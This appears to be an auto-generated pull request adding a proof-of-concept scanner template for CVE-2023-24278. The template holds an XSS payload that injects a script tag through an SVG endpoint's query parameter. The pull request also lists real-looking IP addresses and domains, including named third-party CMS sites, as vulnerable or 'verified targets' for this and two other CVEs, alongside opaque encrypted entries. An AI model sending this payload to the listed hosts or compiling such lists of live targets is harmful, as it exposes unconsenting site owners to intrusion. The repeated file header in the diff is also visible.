### PR TITLE
[Auto-POC] CVE-2023-24278 POC

### DIFF
--- a/templates/nginx/cve-2023-24278.yml
+++ b/templates/nginx/cve-2023-24278.yml
@@ -1,0 +1,7 @@
+cve-id: CVE-2023-24278
+severity: medium
+type: xss
+rules:
+- method: GET
+  path: /squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small
+  expression: response.body.bcontains(b"<script>alert(document.domain)</script>") && response.body.bcontains(b"looking for!") && header(Content-Type:image/svg+xml) && response.status == 200

--- a/templates/nginx/nginx-vul-ips.md
+++ b/templates/nginx/nginx-vul-ips.md
@@ -1,3 +1,5 @@
+# nginx-vul-ips.md
+
 ﻿# nginx-vul-ips.md
 ENCv1:xSTGc5asggmGrgtHT3t4Ng==:H5FmD/wgeHnsc5EXvImlAQ==:+n4bj3DvttChzsEly6EwVd/29F8UeCXcfSMATVnjfjg=
 
@@ -67,3 +69,31 @@ ENCv1:iy5j98h6ZF0SjJYFhia5hw==:d6pVAOdHSLbucox8jw23NA==:tFrkb/XG6Wg11be14qJoG3r2
 ENCv1:jQ3tWQPZYgJ2SwpntooaQA==:l0LLClfqT2al9Ucf6/NBYg==:hSkwM6tV7+JDk8TRQGJOd3SwGJojTWj0h9nJwLjCPI8=
 ENCv1:Se1tC5TMgGQBvOivLDqOsA==:n7+iNXlKx61mDEvTQ1pYzw==:bpXmsNC+yG2EHiMJXjX9Y6qp8wdIUgKEIovd28jSVOA=
 
+## CVE-2023-22897
+https://151.252.216.177
+https://80.147.170.223
+https://93.224.138.177
+
+## CVE-2023-23161
+https://16.28.78.253:50995
+https://54.180.86.136:50777
+http://3.80.48.174:5985
+http://43.209.184.154:10005
+http://43.209.184.154:55555
+https://43.209.184.154:51005
+https://15.152.116.221:111
+https://78.12.252.87:3561
+https://16.51.148.102:3175
+https://webhard.uwincore.com
+
+## CVE-2023-24278
+http://3.6.57.82:5010
+https://168.119.181.58
+https://content-sea.fromlabs.com
+https://cms.kinoshkola.org
+https://cms.vdtt.de
+http://168.119.181.58:3000
+http://159.65.2.228:5000
+http://35.195.88.13:80
+http://160.242.22.80:5001
+http://164.92.180.8:8181


### PR DESCRIPTION
## POC for CVE-2023-24278

### Verified targets

- http://3.6.57.82:5010
- https://168.119.181.58
- https://content-sea.fromlabs.com
- https://cms.kinoshkola.org
- https://cms.vdtt.de
- http://168.119.181.58:3000
- http://159.65.2.228:5000
- http://35.195.88.13:80
- http://160.242.22.80:5001
- http://164.92.180.8:8181

---
*Auto-generated by CVE-Hunter-Pro*
